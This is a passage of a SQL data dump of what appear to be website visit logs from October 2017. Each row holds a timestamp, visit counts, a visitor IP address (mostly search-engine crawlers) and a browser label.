'other'),(167547,1508263101,1,1,0,0,'178.92.74.125','chrome'),(167548,1508263289,1,1,0,0,'217.182.132.82','other'),(167549,1508263475,1,1,0,0,'141.8.132.19','other'),(167550,1508263599,1,1,0,0,'217.182.132.37','other'),(167551,1508263847,1,1,0,0,'91.209.11.236','other'),(167552,1508264106,1,1,0,0,'91.196.178.70','chrome'),(167553,1508264203,1,1,0,0,'91.124.118.171','chrome'),(167554,1508264242,1,1,0,0,'207.46.13.157','other'),(167555,1508264272,1,1,0,0,'178.154.171.81','other'),(167556,1508265057,1,1,0,0,'213.180.203.8','other'),(167557,1508265134,1,1,0,0,'51.255.65.77','other'),(167558,1508265353,1,1,0,0,'217.182.132.85','other'),(167559,1508265405,1,1,0,0,'91.209.11.236','other'),(167560,1508265415,1,1,0,0,'82.145.220.185','chrome'),(167561,1508265662,1,0,1,0,'66.249.64.28',''),(167562,1508265834,1,1,0,0,'51.255.65.62','other'),(167563,1508265858,1,1,0,0,'217.182.132.19','other'),(167564,1508265913,2,2,0,0,'141.8.142.74','other'),(167565,1508266350,1,1,0,0,'137.74.207.108','other'),(167566,1508266493,1,1,0,0,'51.255.65.26','other'),(167567,1508266556,1,1,0,0,'141.8.142.96','other'),(167568,1508266559,1,1,0,0,'37.9.113.114','other'),(167569,1508266564,1,1,0,0,'178.154.171.88','other'),(167570,1508266905,1,1,0,0,'51.255.65.45','other'),(167571,1508267059,1,1,0,0,'217.182.132.53','other'),(167572,1508267888,1,1,0,0,'51.255.65.51','other'),(167573,1508268443,2,0,2,0,'66.249.64.30',''),(167574,1508268676,1,1,0,0,'141.8.142.74','other'),(167575,1508269304,1,1,0,0,'176.8.141.224','chrome'),(167576,1508269601,38,38,0,0,'62.210.101.101','other'),(167577,1508270117,1,1,0,0,'37.73.225.235','chrome'),(167578,1508270118,1,1,0,0,'137.74.207.188','other'),(167579,1508270574,1,1,0,0,'66.249.64.29','chrome'),(167580,1508270607,1,1,0,0,'217.182.132.78','other'),(167581,1508270782,1,1,0,0,'46.119.115.86','chrome'),(167582,1508271255,1,1,0,0,'217.182.132.22','other'),(167583,1508271308,1,1,0,0,'37.73.253.59','chrome'),(167584,1508271365,1,1,0,0,'151.80.27.118','other'),(167585,1508271697,1,1,0,0,'51.255.71.127','other'),(167586,1508271707,1,1,0,0,'217.182.132.241','other'),(167587,1508272079,1,1,0,0,'151.80.27.116','other'),(167588,1508272377,1,1,0,0,'74.115.214.156','other'),(167589,1508272404,1,1,0,0,'51.255.65.71','other'),(167590,1508272707,1,1,0,0,'137.74.207.188','other'),(167591,1508273046,1,1,0,0,'141.8.142.74','other'),(167592,1508273794,1,1,0,0,'8.29.198.26','other'),(167593,1508273935,1,1,0,0,'74.115.214.145','other'),(167594,1508274638,1,1,0,0,'137.74.207.159','other'),(167595,1508274947,1,1,0,0,'51.255.71.117','other'),(167596,1508276129,1,1,0,0,'51.255.65.41','other'),(167597,1508276305,1,1,0,0,'217.182.132.149','other'),(167598,1508276377,1,1,0,0,'141.8.142.74','other'),(167599,1508276898,1,1,0,0,'188.255.16.224','msie'),(167600,1508276899,1,1,0,0,'128.68.210.75','msie'),(167601,1508276918,1,1,0,0,'217.182.132.61','other'),(167602,1508277103,1,1,0,0,'51.255.65.15','other'),(167603,1508277119,1,1,0,0,'51.255.65.54','other'),(167604,1508277237,1,1,0,0,'217.182.132.19','other'),(167605,1508277294,1,1,0,0,'217.182.132.95','other'),(167606,1508277457,1,1,0,0,'51.255.65.28','other'),(167607,1508277492,1,1,0,0,'217.182.132.51','other'),(167608,1508278478,1,1,0,0,'51.255.65.88','other'),(167609,1508278533,1,1,0,0,'217.182.132.17','other'),(167610,1508278835,1,1,0,0,'217.182.132.31','other'),(167611,1508279679,1,1,0,0,'157.55.39.70','other'),(167612,1508279934,2,2,0,0,'5.9.156.74','other'),(167613,1508279999,1,1,0,0,'157.55.39.11','other'),(167614,1508280005,1,1,0,0,'217.182.132.87','other'),(167615,1508280377,1,1,0,0,'217.182.132.147','other'),(167616,1508280572,1,1,0,0,'141.8.142.74','other'),(167617,1508280996,1,0,1,0,'66.249.64.29',''),(167618,1508281017,1,1,0,0,'91.209.11.236','other'),(167619,1508281249,1,1,0,0,'217.182.132.77','other'),(167620,1508281325,1,1,0,0,'137.74.207.101','other'),(167621,1508281362,1,1,0,0,'173.234.234.197','other'),(167622,1508281520,1,1,0,0,'51.255.65.24','other'),(167623,1508281762,1,1,0,0,'51.255.65.44','other'),(167624,1508282268,1,1,0,0,'217.182.132.24','other'),(167625,1508282300,1,1,0,0,'137.74.207.108','other'),(167626,1508282522,1,1,0,0,'51.255.65.4','other'),(167627,1508283141,1,1,0,0,'91.209.11.236','other'),(167628,1508283723,1,1,0,0,'51.255.71.111','other'),(167629,1508284137,1,1,0,0,'141.8.142.74','other'),(167630,1508284483,1,1,0,0,'207.46.13.39','other'),(167631,1508284622,1,1,0,0,'8.29.198.26','other'),(167632,1508284682,1,1,0,0,'51.255.71.127','other'),(167633,1508285434,1,1,0,0,'51.255.65.44','other'),(167634,1508285491,1,1,0,0,'141.8.142.74','other'),(167635,1508285730,1,1,0,0,'51.255.71.126','other'),(167636,1508286260,1,1,0,0,'51.255.71.131','other'),(167637,1508286308,1,1,0,0,'51.255.71.122','other'),(167638,1508286774,1,1,0,0,'193.111.255.43','other'),(167639,1508287181,1,1,0,0,'217.182.132.77','other'),(167640,1508287235,1,1,0,0,'51.255.71.101','other'),(167641,1508287799,1,1,0,0,'157.55.39.70','other'),(167642,1508288212,1,1,0,0,'217.69.133.194','other'),(167643,1508288470,1,1,0,0,'51.255.65.13','other'),(167644,1508288825,1,1,0,0,'51.255.65.97','other'),(167645,1508288844,1,1,0,0,'51.255.65.20','other'),(167646,1508289323,1,1,0,0,'51.255.65.70','other'),(167647,1508289754,1,1,0,0,'217.182.132.153','other'),(167648,1508289843,2,2,0,0,'91.209.11.236','other'),(167649,1508290768,1,1,0,0,'217.182.132.52','other'),(167650,1508291935,1,1,0,0,'217.182.132.32','other'),(167651,1508292731,1,1,0,0,'217.182.132.29','other'),(167652,1508292929,1,1,0,0,'217.182.132.84','other'),(167653,1508292992,1,1,0,0,'137.74.207.119','other'),(167654,1508293471,1,1,0,0,'207.254.40.146','firefox'),(167655,1508293665,1,0,1,0,'66.249.64.29',''),(167656,1508293727,1,1,0,0,'217.182.132.58','other'),(167657,1508294146,1,1,0,0,'217.182.132.59','other'),(167658,1508294190,1,1,0,0,'217.182.132.24','other'),(167659,1508294206,1,1,0,0,'216.244.66.237','other'),(167660,1508294876,1,0,1,0,'66.249.64.28',''),(167661,1508295177,1,1,0,0,'51.255.71.98','other'),(167662,1508295232,1,1,0,0,'217.182.132.79','other'),(167663,1508295445,1,1,0,0,'8.29.198.25','other'),(167664,1508295566,1,1,0,0,'51.255.65.26','other'),(167665,1508295901,1,1,0,0,'217.182.132.27','other'),(167666,1508296234,1,1,0,0,'217.182.132.73','other'),(167667,1508296422,1,1,0,0,'51.255.65.58','other'),(167668,1508297143,1,1,0,0,'207.46.13.39','other'),(167669,1508297820,1,1,0,0,'51.255.65.8','other'),(167670,1508298110,1,1,0,0,'217.182.132.23','other'),(167671,1508298707,1,1,0,0,'141.8.142.74','other'),(167672,1508299100,1,1,0,0,'95.108.181.42','other'),(167673,1508299437,1,1,0,0,'180.76.15.135','other'),(167674,1508300237,1,1,0,0,'51.255.65.23','other'),(167675,1508300542,1,0,1,0,'68.180.229.52',''),(167676,1508300983,1,1,0,0,'207.46.13.39','other'),(167677,1508301046,1,1,0,0,'217.182.132.56','other'),(167678,1508301623,1,1,0,0,'207.46.13.17','other'),(167679,1508301830,1,1,0,0,'178.154.171.88','other'),(167680,1508301842,1,1,0,0,'51.255.71.112','other'),(167681,1508302282,1,1,0,0,'51.255.65.68','other'),(167682,1508302495,1,1,0,0,'51.255.71.127','other'),(167683,1508302650,1,1,0,0,'37.9.113.182','other'),(167684,1508302817,1,1,0,0,'217.182.132.21','other'),(167685,1508302915,15,15,0,0,'144.76.115.190','other'),(167686,1508303075,1,1,0,0,'217.182.132.59','other'),(167687,1508303121,1,1,0,0,'217.182.132.174','other'),(167688,1508303355,1,1,0,0,'51.255.65.72','other'),(167689,1508303659,1,1,0,0,'217.182.132.31','other'),(167690,1508303828,1,1,0,0,'164.132.162.164','other'),(167691,1508303984,1,1,0,0,'217.182.132.96','other'),(167692,1508304200,1,1,0,0,'92.112.222.53','chrome'),(167693,1508304213,1,1,0,0,'217.69.133.3','other'),(167694,1508304507,1,1,0,0,'178.154.171.88','other'),(167695,1508304524,1,1,0,0,'217.182.132.30','other'),(167696,1508304960,1,1,0,0,'51.255.65.90','other'),(167697,1508305189,1,1,0,0,'91.196.178.70','chrome'),(167698,1508306061,1,1,0,0,'141.8.142.74','other'),(167699,1508306286,1,1,0,0,'8.29.198.25','other'),(167700,1508306301,1,1,0,0,'51.255.71.129','other'),(167701,1508306627,1,1,0,0,'51.255.65.9','other'),(167702,1508306995,1,1,0,0,'91.196.178.65','firefox'),(167703,1508307164,1,1,0,0,'217.182.132.78','other'),(167704,1508307816,1,1,0,0,'217.182.132.91','other'),(167705,1508308126,1,1,0,0,'217.182.132.149','other'),(167706,1508308148,1,1,0,0,'217.182.132.60','other'),(167707,1508308160,1,1,0,0,'217.182.132.170','other'),(167708,1508308258,1,1,0,0,'137.74.207.170','other'),(167709,1508308489,1,1,0,0,'51.255.65.14','other'),(167710,1508308813,1,1,0,0,'216.244.66.237','other'),(167711,1508308843,1,1,0,0,'92.113.53.233','chrome'),(167712,1508308990,1,1,0,0,'91.196.178.65','chrome'),(167713,1508309049,1,1,0,0,'77.222.155.89','chrome'),(167714,1508309161,1,1,0,0,'51.255.65.18','other'),(167715,1508309251,1,1,0,0,'92.113.40.49','chrome'),(167716,1508309290,4,4,0,0,'88.198.16.12','other'),(167717,1508309339,1,1,0,0,'194.183.183.82','chrome'),(167718,1508309413,1,1,0,0,'91.196.178.129','firefox'),(167719,1508309500,1,1,0,0,'217.182.132.56','other'),(167720,1508309725,1,1,0,0,'51.255.65.49','other'),(167721,1508311156,1,1,0,0,'217.182.132.241','other'),(167722,1508311355,1,1,0,0,'217.182.132.88','other'),(167723,1508311430,1,1,0,0,'66.102.9.27','chrome'),(167724,1508311538,1,1,0,0,'94.242.252.40','chrome'),(167725,1508311615,1,1,0,0,'141.8.142.74','other'),(167726,1508311863,1,1,0,0,'216.244.66.237','other'),(167727,1508312162,1,1,0,0,'51.255.65.37','other'),(167728,1508312388,1,1,0,0,'51.255.65.71','other'),(167729,1508313336,1,1,0,0,'176.241.142.108','chrome'),(167730,1508313435,1,1,0,0,'141.8.142.74','other'),(167731,1508313556,1,1,0,0,'95.132.61.211','chrome'),(167732,1508313562,1,1,0,0,'106.38.241.150','other'),(167733,1508313593,1,1,0,0,'137.74.207.159','other'),(167734,1508313965,1,1,0,0,'217.182.132.80','other'),(167735,1508314181,1,1,0,0,'194.44.17.254','chrome'),(167736,1508314320,1,1,0,0,'164.132.162.154','other'),(167737,1508314456,1,1,0,0,'217.182.132.187','other'),(167738,1508314509,1,1,0,0,'51.255.71.130','other'),(167739,1508314875,1,1,0,0,'217.182.132.90','other'),(167740,1508314939,1,1,0,0,'92.113.4.248','chrome'),(167741,1508315012,1,1,0,0,'176.37.55.126','chrome'),(167742,1508315111,1,1,0,0,'217.69.133.6','other'),(167743,1508315148,1,1,0,0,'164.132.162.188','other'),(167744,1508315149,1,1,0,0,'51.255.65.5','other'),(167745,1508315300,1,1,0,0,'217.182.132.190','other'),(167746,1508315450,1,1,0,0,'217.182.132.170','other'),(167747,1508315867,1,1,0,0,'91.196.178.168','chrome'),(167748,1508316135,1,1,0,0,'51.255.65.7','other'),(167749,1508316608,1,1,0,0,'217.182.132.18','other'),(167750,1508317065,1,1,0,0,'141.8.142.74','other'),(167751,1508317115,1,1,0,0,'8.29.198.25','other'),(167752,1508317150,1,1,0,0,'217.182.132.185','other'),(167753,1508317275,1,1,0,0,'217.182.132.72','other'),(167754,1508317483,1,1,0,0,'194.50.254.169','chrome'),(167755,1508318173,1,1,0,0,'180.76.15.12','other'),(167756,1508318234,1,1,0,0,'217.182.132.85','other'),(167757,1508318339,1,1,0,0,'178.154.171.88','other'),(167758,1508318882,4,4,0,0,'95.10.186.188','other'),(167759,1508319028,1,1,0,0,'217.182.132.178','other'),(167760,1508319881,1,1,0,0,'46.133.232.109','chrome'),(167761,1508319996,1,1,0,0,'137.74.207.161','other'),(167762,1508320166,1,1,0,0,'137.74.207.159','other'),(167763,1508320816,1,1,0,0,'217.182.132.52','other'),(167764,1508321029,1,1,0,0,'217.182.132.69','other'),(167765,1508321170,1,1,0,0,'217.182.132.25','other'),(167766,1508321734,1,1,0,0,'138.197.146.235','chrome'),(167767,1508321896,1,1,0,0,'62.210.201.88','chrome'),(167768,1508322238,1,1,0,0,'51.255.65.21','other'),(167769,1508322300,1,1,0,0,'51.255.65.39','other'),(167770,1508322379,1,1,0,0,'91.196.176.18','chrome'),(167771,1508322831,1,1,0,0,'51.255.65.65','other'),(167772,1508323509,1,1,0,0,'217.182.132.179','other'),(167773,1508323672,1,1,0,0,'51.255.71.118','other'),(167774,1508324346,1,1,0,0,'164.132.162.156','other'),(167775,1508324649,1,1,0,0,'51.255.65.12','other'),(167776,1508325023,1,1,0,0,'91.196.178.70','chrome'),(167777,1508325356,1,1,0,0,'162.210.196.97','other'),(167778,1508325877,1,1,0,0,'51.255.65.37','other'),(167779,1508326173,1,1,0,0,'217.69.133.9','other'),(167780,1508326174,1,1,0,0,'217.69.133.5','other'),(167781,1508326820,1,1,0,0,'217.182.132.82','other'),(167782,1508326869,1,1,0,0,'164.132.162.188','other'),(167783,1508327066,1,1,0,0,'51.255.65.96','other'),(167784,1508327377,1,1,0,0,'51.255.65.15','other'),(167785,1508327387,1,1,0,0,'217.182.132.52','other'),(167786,1508327944,1,1,0,0,'8.29.198.26','other'),(167787,1508328041,1,1,0,0,'5.62.34.9','firefox'),(167788,1508328187,1,1,0,0,'54.165.59.7','other'),(167789,1508328228,3,3,0,0,'95.10.186.188','other'),(167790,1508328255,1,1,0,0,'95.133.183.170','chrome'),(167791,1508329179,1,1,0,0,'51.255.65.42','other'),(167792,1508329512,1,1,0,0,'217.182.132.94','other'),(167793,1508329539,1,1,0,0,'82.145.220.168','chrome'),(167794,1508329718,1,1,0,0,'51.255.65.27','other'),(167795,1508329843,1,1,0,0,'217.182.132.185','other'),(167796,1508329999,1,1,0,0,'51.255.65.3','other'),(167797,1508330029,1,1,0,0,'51.255.71.131','other'),(167798,1508330468,1,1,0,0,'95.132.30.187','firefox'),(167799,1508330514,1,1,0,0,'207.46.13.121','other'),(167800,1508330600,1,1,0,0,'141.8.142.74','other'),(167801,1508330761,1,1,0,0,'51.255.65.87','other'),(167802,1508330890,1,1,0,0,'51.255.71.118','other'),(167803,1508331080,1,1,0,0,'37.54.19.148','chrome'),(167804,1508331121,1,1,0,0,'95.132.53.144','firefox'),(167805,1508331127,1,1,0,0,'51.255.65.22','other'),(167806,1508331286,1,1,0,0,'91.196.178.34','chrome'),(167807,1508331436,1,1,0,0,'217.182.132.24','other'),(167808,1508331856,1,1,0,0,'51.255.65.97','other'),(167809,1508332033,1,1,0,0,'51.255.65.60','other'),(167810,1508332195,1,1,0,0,'51.255.65.20','other'),(167811,1508332245,1,1,0,0,'137.74.207.110','other'),(167812,1508332337,1,1,0,0,'51.255.65.7','other'),(167813,1508332493,1,1,0,0,'217.69.133.6','other'),(167814,1508332577,1,1,0,0,'37.52.26.251','chrome'),(167815,1508332645,1,1,0,0,'51.255.65.4','other'),(167816,1508332881,1,1,0,0,'91.217.179.146','chrome'),(167817,1508333090,1,1,0,0,'164.132.162.154','other'),(167818,1508333315,1,1,0,0,'51.255.65.25','other'),(167819,1508333410,1,0,1,0,'66.249.64.29',''),(167820,1508333713,1,1,0,0,'91.196.177.15','chrome'),(167821,1508334401,1,1,0,0,'217.182.132.95','other'),(167822,1508334564,1,1,0,0,'31.41.70.6','chrome'),(167823,1508334690,1,1,0,0,'91.196.178.166','firefox'),(167824,1508334898,1,0,1,0,'68.180.229.52',''),(167825,1508335200,1,1,0,0,'164.132.162.187','other'),(167826,1508335512,1,1,0,0,'217.69.133.218','other'),(167827,1508335707,1,1,0,0,'217.182.132.173','other'),(167828,1508335809,1,1,0,0,'51.255.65.68','other'),(167829,1508336572,1,1,0,0,'217.182.132.71','other'),(167830,1508337269,2,2,0,0,'216.244.66.237','other'),(167831,1508337328,2,2,0,0,'217.182.132.16','other'),(167832,1508337489,1,1,0,0,'217.182.132.32','other'),(167833,1508337851,1,1,0,0,'51.255.71.128','other'),(167834,1508338055,1,1,0,0,'217.182.132.155','other'),(167835,1508338372,1,1,0,0,'137.74.207.164','other'),(167836,1508338756,1,1,0,0,'217.182.132.146','other'),(167837,1508338779,1,1,0,0,'8.29.198.26','other'),(167838,1508338884,1,1,0,0,'217.182.132.32','other'),(167839,1508339080,1,1,0,0,'91.196.178.68','firefox'),(167840,1508339323,1,1,0,0,'66.249.64.28','chrome'),(167841,1508339369,1,1,0,0,'46.211.4.254','chrome'),(167842,1508339476,1,1,0,0,'51.255.65.97','other'),(167843,1508339538,1,1,0,0,'217.182.132.22','other'),(167844,1508339595,1,1,0,0,'51.255.65.15','other'),(167845,1508339635,1,0,1,0,'66.249.64.30',''),(167846,1508340023,1,1,0,0,'51.255.65.80','other'),(167847,1508340118,1,0,1,0,'66.249.64.29',''),(167848,1508340412,1,1,0,0,'141.8.142.74','other'),(167849,1508340489,1,1,0,0,'87.250.224.46','other'),(167850,1508340555,1,1,0,0,'51.255.65.92','other'),(167851,1508340563,1,1,0,0,'217.182.132.77','other'),(167852,1508340881,1,1,0,0,'77.243.183.169','chrome'),(167853,1508341061,1,1,0,0,'66.249.70.25','chrome'),(167854,1508341217,1,1,0,0,'51.255.65.21','other'),(167855,1508341301,1,1,0,0,'77.243.183.170','chrome'),(167856,1508341348,1,1,0,0,'51.255.65.7','other'),(167857,1508341783,1,1,0,0,'51.255.65.73','other'),(167858,1508342258,1,1,0,0,'92.113.127.169','chrome'),(167859,1508342351,1,1,0,0,'195.69.221.54','chrome'),(167860,1508342588,1,1,0,0,'217.182.132.24','other'),(167861,1508343015,1,1,0,0,'217.69.133.194','other'),(167862,1508343316,1,1,0,0,'217.182.132.188','other'),(167863,1508343373,1,1,0,0,'180.76.15.15','other'),(167864,1508343580,1,1,0,0,'217.69.133.4','other'),(167865,1508343712,1,1,0,0,'141.8.142.74','other'),(167866,1508344000,1,1,0,0,'77.243.183.162','chrome'),(167867,1508344096,1,1,0,0,'180.76.15.13','other'),(167868,1508344171,1,1,0,0,'217.182.132.171','other'),(167869,1508344333,1,1,0,0,'217.182.132.36','other'),(167870,1508344710,1,1,0,0,'141.8.142.74','other'),(167871,1508344892,1,1,0,0,'91.196.178.67','chrome'),(167872,1508344948,2,2,0,0,'91.209.11.236','other'),(167873,1508344977,1,1,0,0,'176.8.79.162','chrome'),(167874,1508345372,1,1,0,0,'51.255.65.224','other'),(167875,1508345405,1,1,0,0,'51.255.65.95','other'),(167876,1508345494,1,1,0,0,'217.182.132.80','other'),(167877,1508345699,1,1,0,0,'178.92.74.125','chrome'),(167878,1508345833,1,1,0,0,'217.182.132.35','other'),(167879,1508346083,1,1,0,0,'91.209.11.236','other'),(167880,1508346134,1,1,0,0,'37.73.221.21','other'),(167881,1508346214,1,1,0,0,'91.196.178.132','chrome'),(167882,1508346428,1,1,0,0,'51.255.65.33','other'),(167883,1508347034,1,1,0,0,'217.182.132.4','other'),(167884,1508347261,1,1,0,0,'217.182.132.97','other'),(167885,1508347683,1,1,0,0,'216.244.66.237','other'),(167886,1508347778,1,1,0,0,'178.154.171.88','other'),(167887,1508347847,2,2,0,0,'46.200.101.225','chrome'),(167888,1508348152,2,2,0,0,'141.8.142.74','other'),(167889,1508348241,1,1,0,0,'87.250.224.46','other'),(167890,1508348370,1,1,0,0,'91.196.178.33','chrome'),(167891,1508349434,1,1,0,0,'77.243.183.172','chrome'),(167892,1508349617,1,1,0,0,'94.179.246.85','chrome'),(167893,1508349620,1,1,0,0,'8.29.198.25','other'),(167894,1508349755,1,1,0,0,'51.255.65.58','other'),(167895,1508349907,1,1,0,0,'165.227.141.246','chrome'),(167896,1508350117,3,3,0,0,'141.8.142.74','other'),(167897,1508350381,1,1,0,0,'217.182.132.67','other'),(167898,1508350406,1,1,0,0,'217.182.132.63','other'),(167899,1508350416,1,1,0,0,'176.8.141.224','chrome'),(167900,1508350421,1,1,0,0,'130.180.208.44','chrome'),(167901,1508351349,1,1,0,0,'87.250.224.46','other'),(167902,1508351358,1,1,0,0,'141.8.142.74','other'),(167903,1508351683,1,1,0,0,'51.255.65.68','other'),(167904,1508351999,1,1,0,0,'217.182.132.95','other'),(167905,1508352327,1,1,0,0,'77.243.183.171','firefox'),(167906,1508352353,1,1,0,0,'178.154.171.88','other'),(167907,1508352378,1,1,0,0,'137.74.207.108','other'),(167908,1508352801,1,1,0,0,'178.255.215.94','other'),(167909,1508352891,2,2,0,0,'46.185.2.157','other'),(167910,1508353039,1,1,0,0,'31.13.114.53','other'),(167911,1508353402,1,1,0,0,'91.196.178.133','chrome'),(167912,1508353430,1,1,0,0,'62.122.182.106','firefox'),(167913,1508353599,1,1,0,0,'141.8.142.74','other'),(167914,1508353809,1,1,0,0,'51.255.71.98','other'),(167915,1508354007,1,1,0,0,'217.69.133.4','other'),(167916,1508354218,1,1,0,0,'137.74.207.161','other'),(167917,1508354288,1,1,0,0,'79.110.129.249','chrome'),(167918,1508355470,1,1,0,0,'51.255.71.122','other'),(167919,1508355965,1,1,0,0,'66.249.64.16','chrome'),(167920,1508357154,1,1,0,0,'91.196.178.71','other'),(167921,1508357246,1,1,0,0,'178.154.171.88','other'),(167922,1508358172,1,1,0,0,'164.132.162.164','other'),(167923,1508358377,1,1,0,0,'51.255.65.2','other'),(167924,1508359150,1,1,0,0,'217.182.132.191','other'),(167925,1508359192,1,1,0,0,'51.255.65.66','other'),(167926,1508359269,1,1,0,0,'51.255.65.59','other'),(167927,1508359578,1,1,0,0,'164.132.162.159','other'),(167928,1508360214,1,1,0,0,'217.182.132.57','other'),(167929,1508360415,1,1,0,0,'217.182.132.65','other'),(167930,1508360451,1,1,0,0,'8.29.198.27','other'),(167931,1508360566,1,1,0,0,'217.182.132.5','other'),(167932,1508360767,1,1,0,0,'141.8.142.74','other'),(167933,1508361061,1,0,1,0,'66.249.64.16',''),(167934,1508361128,1,1,0,0,'217.182.132.96','other'),(167935,1508361288,1,1,0,0,'217.182.132.57','other'),(167936,1508361443,1,1,0,0,'51.255.65.12','other'),(167937,1508361529,1,1,0,0,'217.182.132.56','other'),(167938,1508361566,1,1,0,0,'216.244.66.237','other'),(167939,1508361622,1,1,0,0,'80.77.163.133','chrome'),(167940,1508361688,1,1,0,0,'67.215.230.84','other'),(167941,1508362605,2,2,0,0,'141.8.142.74','other'),(167942,1508362872,1,1,0,0,'217.182.132.149','other'),(167943,1508363304,1,1,0,0,'178.154.171.88','other'),(167944,1508363306,1,1,0,0,'37.9.113.182','other'),(167945,1508363471,1,1,0,0,'91.196.178.38','other'),(167946,1508363588,1,1,0,0,'217.182.132.182','other'),(167947,1508364159,1,1,0,0,'37.53.233.212','chrome'),(167948,1508364270,2,2,0,0,'141.8.142.74','other'),(167949,1508364515,1,1,0,0,'217.182.132.24','other'),(167950,1508365081,1,1,0,0,'217.182.132.57','other'),(167951,1508365172,1,1,0,0,'217.182.132.157','other'),(167952,1508365314,1,1,0,0,'178.154.171.88','other'),(167953,1508365678,1,1,0,0,'51.255.65.35','other'),(167954,1508365770,1,1,0,0,'217.182.132.172','other'),(167955,1508365781,1,1,0,0,'141.8.142.74','other'),(167956,1508366481,1,1,0,0,'51.255.65.43','other'),(167957,1508367153,1,1,0,0,'178.154.171.88','other'),(167958,1508367496,1,1,0,0,'137.74.207.170','other'),(167959,1508368011,1,1,0,0,'51.255.65.31','other'),(167960,1508368170,1,1,0,0,'51.255.65.83','other'),(167961,1508368404,1,1,0,0,'217.182.132.60','other'),(167962,1508368472,1,1,0,0,'217.182.132.16','other'),(167963,1508369918,1,1,0,0,'51.255.65.6','other'),(167964,1508369931,2,2,0,0,'141.8.142.74','other'),(167965,1508370101,1,1,0,0,'164.132.162.153','other'),(167966,1508370139,1,1,0,0,'178.154.171.88','other'),(167967,1508370577,1,1,0,0,'217.69.133.3','other'),(167968,1508370752,1,1,0,0,'51.255.65.15','other'),(167969,1508370929,3,3,0,0,'69.30.198.242','other'),(167970,1508371016,1,1,0,0,'164.132.162.155','other'),(167971,1508371214,1,1,0,0,'178.154.171.88','other'),(167972,1508371270,1,1,0,0,'217.69.133.194','other'),(167973,1508371275,1,1,0,0,'8.29.198.27','other'),(167974,1508371321,1,1,0,0,'51.255.65.82','other'),(167975,1508371348,1,1,0,0,'87.250.224.46','other'),(167976,1508371507,2,2,0,0,'137.74.203.194','other'),(167977,1508372154,1,1,0,0,'51.255.65.90','other'),(167978,1508372457,1,1,0,0,'51.255.65.93','other'),(167979,1508372809,1,1,0,0,'178.154.171.88','other'),(167980,1508372923,1,1,0,0,'141.8.142.74','other'),(167981,1508373034,1,1,0,0,'217.182.132.80','other'),(167982,1508373076,1,1,0,0,'51.255.65.97','other'),(167983,1508373077,1,1,0,0,'91.209.11.236','other'),(167984,1508373259,1,1,0,0,'217.182.132.147','other'),(167985,1508373303,1,1,0,0,'141.8.132.19','other'),(167986,1508373318,1,1,0,0,'217.182.132.86','other'),(167987,1508373375,1,1,0,0,'180.76.15.13','other'),(167988,1508373377,1,1,0,0,'180.76.15.12','other'),(167989,1508373449,1,1,0,0,'51.255.65.75','other'),(167990,1508373522,1,1,0,0,'51.255.65.79','other'),(167991,1508373604,1,1,0,0,'51.255.65.9','other'),(167992,1508373831,1,1,0,0,'51.255.65.41','other'),(167993,1508374143,3,3,0,0,'141.8.142.74','other'),(167994,1508374515,1,1,0,0,'137.74.207.108','other'),(167995,1508374529,4,4,0,0,'178.154.171.88','other'),(167996,1508375061,1,1,0,0,'217.182.132.57','other'),(167997,1508375844,1,1,0,0,'217.182.132.90','other'),(167998,1508376092,1,1,0,0,'51.255.65.61','other'),(167999,1508376239,1,1,0,0,'87.250.224.46','other'),(168000,1508376273,1,1,0,0,'141.8.142.74','other'),(168001,1508376373,1,1,0,0,'207.46.13.121','other'),(168002,1508376401,3,3,0,0,'178.154.171.88','other'),(168003,1508376462,1,1,0,0,'51.255.65.36','other'),(168004,1508376556,1,1,0,0,'51.255.65.11','other'),(168005,1508376655,1,1,0,0,'51.255.65.68','other'),(168006,1508376777,1,1,0,0,'217.182.132.176','other'),(168007,1508376928,1,1,0,0,'217.182.132.182','other'),(168008,1508377257,1,1,0,0,'217.182.132.78','other'),(168009,1508377563,1,1,0,0,'51.255.65.37','other'),(168010,1508377602,1,1,0,0,'217.182.132.18','other'),(168011,1508377639,1,1,0,0,'51.255.65.2','other'),(168012,1508377749,1,1,0,0,'87.250.224.46','other'),(168013,1508377752,1,1,0,0,'178.154.200.28','other'),(168014,1508377780,2,2,0,0,'217.182.132.36','other'),(168015,1508377907,1,1,0,0,'217.182.132.70','other'),(168016,1508378578,1,1,0,0,'217.182.132.241','other'),(168017,1508378742,1,1,0,0,'51.255.65.31','other'),(168018,1508379438,1,1,0,0,'217.182.132.15','other'),(168019,1508379715,1,1,0,0,'37.9.113.138','other'),(168020,1508379846,1,1,0,0,'37.9.113.157','other'),(168021,1508380016,1,1,0,0,'91.209.11.236','other'),(168022,1508380508,1,1,0,0,'217.182.132.94','other'),(168023,1508380778,1,1,0,0,'95.108.213.24','other'),(168024,1508381230,1,1,0,0,'217.182.132.70','other'),(168025,1508381241,1,1,0,0,'178.154.171.56','other'),(168026,1508381987,1,1,0,0,'51.255.65.70','other'),(168027,1508382104,1,1,0,0,'8.29.198.26','other'),(168028,1508382139,1,1,0,0,'91.209.11.236','other'),(168029,1508382246,1,1,0,0,'51.255.65.7','other'),(168030,1508382334,1,1,0,0,'51.255.65.41','other'),(168031,1508382758,3,3,0,0,'141.8.142.74','other'),(168032,1508383208,1,1,0,0,'217.182.132.73','other'),(168033,1508383432,1,1,0,0,'51.255.65.20','other'),(168034,1508383523,1,1,0,0,'180.76.15.151','other'),(168035,1508383603,1,1,0,0,'141.8.132.19','other'),(168036,1508383859,1,1,0,0,'141.8.142.74','other'),(168037,1508384085,2,2,0,0,'91.209.11.236','other'),(168038,1508384267,1,1,0,0,'87.250.224.46','other'),(168039,1508384419,1,1,0,0,'217.182.132.88','other'),(168040,1508385031,1,1,0,0,'51.255.65.84','other'),(168041,1508385154,1,1,0,0,'95.24.90.139','chrome'),(168042,1508385156,1,1,0,0,'37.145.123.9','chrome'),(168043,1508385813,1,1,0,0,'37.9.113.182','other'),(168044,1508386218,1,1,0,0,'137.74.207.102','other'),(168045,1508386256,1,0,1,0,'66.249.70.27',''),(168046,1508386516,1,1,0,0,'217.182.132.18','other'),(168047,1508386521,1,1,0,0,'51.15.62.146','chrome'),(168048,1508386926,1,1,0,0,'46.133.163.194','chrome'),(168049,1508386944,1,1,0,0,'51.255.65.63','other'),(168050,1508387211,1,1,0,0,'217.69.133.9','other'),(168051,1508387382,1,1,0,0,'217.182.132.51','other'),(168052,1508387509,1,1,0,0,'5.45.207.83','other'),(168053,1508387522,1,1,0,0,'51.255.65.80','other'),(168054,1508387653,1,1,0,0,'51.255.71.125','other'),(168055,1508387672,1,1,0,0,'5.45.207.82','other'),(168056,1508387674,1,1,0,0,'93.174.93.71','chrome'),(168057,1508387676,1,1,0,0,'178.154.200.7','other'),(168058,1508387702,1,1,0,0,'66.249.70.29','chrome'),(16